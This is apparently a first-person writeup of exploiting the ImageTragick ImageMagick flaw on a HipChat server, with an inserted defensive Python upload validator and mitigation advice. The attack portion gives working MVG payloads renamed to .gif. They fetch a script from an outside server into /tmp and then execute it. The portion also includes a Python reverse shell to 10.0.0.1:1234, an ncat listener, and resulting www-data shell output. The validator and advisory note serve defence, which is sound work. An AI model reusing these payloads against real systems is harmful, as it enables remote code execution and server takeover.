It turns out the ImageTragick PoC didn't work on our server:
push graphic-context viewbox 0 0 640 480 fill 'url(https://example.com/image.jpg";|ls "-la)' pop graphic-context
After quite a bit of mangling and testing, the following file contents, renamed to a .gif (HipChat doesn't accept .mvg files), will work:
push graphic-context viewbox 0 0 640 480 fill 'url(https://example.com/image.jpg";curl testserver:8000/test4")' pop graphic-context
I could see the request for "test4" in my testserver's logs. Woot. This means we have remote command execution on the server. Now all we have to do is get a shell.
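The rename trick above works because ImageMagick picks the coder from the file's content, not its extension, so MVG text called something.gif is still parsed as MVG. An upload endpoint that only checks the extension therefore learns nothing from it. The check below is an added example of the defensive validation such an endpoint should do before handing anything to ImageMagick; it is not HipChat's or ImageMagick's code, and the sample uploads at the bottom are constructed for this example.

```python
"""Upload check for an image endpoint that hands files to ImageMagick.

Refuses extensions outside an allow-list, refuses bodies that contain
MVG/MSL directives (ImageMagick recognises those text formats by content
regardless of the file name), flags shell metacharacters inside a
url(...) reference, and requires the magic bytes to match the extension.
Added example; the sample uploads are constructed, not real traffic.
"""
from __future__ import annotations

import re

# Magic bytes for the raster formats this endpoint allows.
MAGIC: dict[str, tuple[bytes, ...]] = {
    "gif": (b"GIF87a", b"GIF89a"),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
}

# Markers of ImageMagick's text-based coders (MVG and MSL), which it
# recognises by content no matter what the file is called.
TEXT_FORMAT_MARKERS = (
    re.compile(rb"^\s*push\s+graphic-context", re.I | re.M),  # MVG
    re.compile(rb"^\s*viewbox\s", re.I | re.M),               # MVG
    re.compile(rb"<image\b", re.I),                           # MSL
)

# A quote, pipe, semicolon or backtick inside url(...) is the signature of
# the delegate command injection described in the writeup.
URL_INJECTION = re.compile(rb"url\([^)]*[\"'|;`]", re.I)


def classify_upload(filename: str, data: bytes) -> tuple[bool, str]:
    """Return (accepted, reason) for one uploaded file."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    allowed = MAGIC.get(ext)
    if allowed is None:
        return False, f"extension {ext or '(none)'!r} not allowed"
    head = data[:4096]  # directives and magic bytes all sit at the start
    for marker in TEXT_FORMAT_MARKERS:
        if marker.search(head):
            return False, "MVG/MSL directives present"
    if URL_INJECTION.search(head):
        return False, "shell metacharacters inside url()"
    if not data.startswith(allowed):
        return False, f"magic bytes do not match .{ext}"
    return True, "ok"


# Constructed samples: a genuine 1x1 GIF, and MVG text uploaded under a
# .gif name exactly as the writeup describes.
REAL_GIF = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff"
            b"!\xf9\x04\x01\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00"
            b"\x00\x02\x02D\x01\x00;")
MVG_AS_GIF = (b"push graphic-context\nviewbox 0 0 640 480\n"
              b"fill 'url(https://example.com/image.jpg\";|ls \"-la)'\n"
              b"pop graphic-context\n")


if __name__ == "__main__":
    for name, body in (("cat.gif", REAL_GIF), ("cat.gif", MVG_AS_GIF),
                       ("cat.mvg", MVG_AS_GIF)):
        print(name, classify_upload(name, body))
```

This is a gate in front of ImageMagick, not a replacement for fixing ImageMagick itself: the durable mitigation published with the ImageTragick advisory is a policy.xml that disables the EPHEMERAL, URL, HTTPS, MVG and MSL coders, and the magic-byte check here is the complementary application-side control the advisory also recommends.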
Since I didn't have time to figure out how to make it a leet one-liner, I decided to break shell access into two requests: the first pulls the shell script down to /tmp/ and the second executes it.
The reverse shell I used was:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
I simply pasted that into a .sh file on my testserver so the victim HipChat server could pull it down.
I listened on my remote box with a basic ncat listener:
ncat -l -v 1234
Then I created the two separate exploit .gif files. The first .gif runs curl to download the python shell:
push graphic-context viewbox 0 0 640 480 fill 'url(https://example.com/image.jpg";curl testserver:8000/python_shell.sh -o /tmp/python_shell.sh")' pop graphic-context
The second .gif executes the python shell:
push graphic-context viewbox 0 0 640 480 fill 'url(https://example.com/image.jpg";bash /tmp/python_shell.sh")' pop graphic-context
(now that I think about it, you might be able to combine both files into one to only have to upload once, but I haven't tested that)
Once you upload that second gif, about a second or two later you should see your shell come through on the ncat listener on port 1234:
$ uname -a
Linux hipchat.blah.com 3.4.0-54-generic #81~precise1-Ubuntu SMP Tue Jul 15 04:02:22 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
So ImageTragick is kind of a big deal in that it's stupid easy to exploit (at least in this case) and it's a fairly reliable command injection vuln.